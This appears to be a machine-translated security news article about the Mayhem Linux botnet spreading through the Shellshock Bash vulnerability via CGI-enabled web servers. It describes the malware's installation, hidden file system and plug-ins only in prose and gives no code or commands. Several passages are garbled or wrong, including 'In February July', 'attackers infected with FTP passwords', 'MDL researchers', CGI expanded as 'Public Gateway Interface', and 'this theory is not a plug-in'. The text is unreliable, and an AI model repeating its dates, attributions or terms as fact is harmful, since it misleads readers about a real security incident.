Spread of Linux botnet Mayhem through Shellshock Vulnerability
The impact of Shellshock continues: attackers are exploiting the vulnerability found in the recent Bash command line interpreter to infect Linux servers through the complex malware program Mayhem.
Mayhem was found earlier this year to have been thoroughly analyzed by the Russian Internet company Yandex. The malware is installed using a PHP script that is uploaded to the server by attackers infected with FTP passwords, website vulnerabilities, or brute-force cracking of website management logon creden.
The main component of Mayhem is a malicious ELF library file. After installation, this file downloads additional plug-ins and stores them in a hidden encrypted file system. These plug-ins allow attackers to use newly infected servers to attack and infect other websites.
In February July, Yandex researchers estimated that the botnet had approximately 1400 infected servers linked to two independent command control servers.
Researchers from the independent research company Malware Must Die (MMD) reported earlier this week that Mayhem writers have added the Shellshock vulnerability to exploit the botnet's weapons library.
Shellshock is a general term for multiple vulnerabilities recently discovered in the LinuxBash command line interpreter. These vulnerabilities can be exploited to execute remote code on the server. through several attack vectors, including CGI (Public Gateway Interface), OpenSSH, and DHCP (Dynamic Host Configuration Protocol ), in some cases, there may even be OpenVPN.
According to researchers at MMD, The Shellshock attack originating from the Mayhem botnet targets web servers with CGI support. Botnets detect whether web servers are vulnerable to Bash attacks and then use them to execute Perl scripts.
The script has a malicious Mayhem ELF binary file for 32-bit and 64-bit CPU architectures. These architectures are embedded as hexadecimal data and use the LD_PRELOAD function to extract and run them.
Like previous versions, it creates a hidden file system to store its additional components and plug-ins. These tools can be used to scan and attack other systems. MDL researchers believe that a component in these components has been upgraded to exploiting the new Shellshock vulnerability, but has not yet been confirmed.
However, this theory is not a plug-in. It turns out that some of the observed Shellshock attacks are originated from the IP (Internet Protocol) addresses related to the existing Mayhem botnet, in addition to new IP addresses from the UK, Indonesia, Poland, Austria, Australia, and Sweden. MMD has shared the information it has collected to the National Computer Emergency Response Team (CERTs ).
Most Linux distributions have released patches to fix the Shellshock vulnerability. However, many web servers, especially self-managed servers, have not been configured to automatically deploy updates. Many Linux-based enterprise products and embedded devices, including web servers, are vulnerable to the Shellshock vulnerability. If these products do not have patches installed or are not available, they may all become targets of attacks.